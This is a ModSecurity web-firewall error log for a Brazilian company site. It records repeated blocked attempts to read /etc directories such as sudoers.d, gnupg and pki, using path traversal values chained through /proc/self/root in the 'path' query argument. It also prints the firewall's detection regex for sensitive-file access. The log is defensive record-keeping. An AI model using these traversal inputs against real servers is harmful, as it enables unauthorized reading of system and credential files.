[Tue Mar 17 11:07:40.024627 2026] [:error] [pid 9155:tid 140411599251200] [client 74.7.243.203:33882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgLNbI7zhHXcabyMUvOgAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:41.147083 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.243.203:54252] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgLe82sZHvlq4xgHrNhQAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:43.093245 2026] [:error] [pid 18709:tid 140411708356352] [client 74.7.243.203:54256] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgLjarLhPAjZGI1b24GAAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:44.483310 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.203:54264] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgMKBJNF7axNlVR0UGNgAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:45.718813 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.243.203:54270] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgMZqmL8PQht4WJFlQ_AAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:46.904792 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.203:54274] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgMgeiSKl8TjouI-YKlAAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:48.238588 2026] [:error] [pid 9155:tid 140411725141760] [client 74.7.243.203:54290] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgNNbI7zhHXcabyMUvawAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:49.419238 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.243.203:54304] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgNaBJNF7axNlVR0UGOgAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:53.324169 2026] [:error] [pid 18709:tid 140411725141760] [client 74.7.243.203:52750] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgOTarLhPAjZGI1b24HwAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:54.612802 2026] [:error] [pid 17965:tid 140411741927168] [client 74.7.243.203:52766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgOqt8Nd0UC_OcbVG5sgAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:58.966056 2026] [:error] [pid 8856:tid 140411658000128] [client 74.7.243.203:52770] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgPnUHeC6oxrTQ0VC3pQAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:59.711268 2026] [:error] [pid 9155:tid 140411666392832] [client 74.7.241.46:43376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgP9bI7zhHXcabyMUviAAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:08:00.291125 2026] [:error] [pid 8856:tid 140411674785536] [client 74.7.243.203:35594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgQHUHeC6oxrTQ0VC3pwAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:08:01.691479 2026] [:error] [pid 18709:tid 140411540502272] [client 74.7.243.203:35606] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgQTarLhPAjZGI1b24IgAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:08:04.256877 2026] [:error] [pid 18709:tid 140411624429312] [client 74.7.243.203:35608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgRDarLhPAjZGI1b24KQAAA44"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:08:05.521503 2026] [:error] [pid 7437:tid 140411624429312] [client 74.7.243.203:35616] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgRQeiSKl8TjouI-YKngAAA84"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:08:13.632099 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.243.203:35626] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgTa4xEDsg_V3ESNY9VQAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:08:19.964533 2026] [:error] [pid 9155:tid 140411733534464] [client 74.7.243.203:57908] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgUtbI7zhHXcabyMUvrgAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:08:42.316815 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.243.203:46156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgau82sZHvlq4xgHrNpQAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:08:43.694936 2026] [:error] [pid 2325:tid 140411674785536] [client 74.7.243.203:57576] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablga-82sZHvlq4xgHrNpwAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:08:47.111420 2026] [:error] [pid 2325:tid 140411616036608] [client 74.7.243.203:57592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgb-82sZHvlq4xgHrNrAAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:09:21.943324 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.244.31:60398] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablgkdY0UrI5A3LftIzregAAAYQ"]
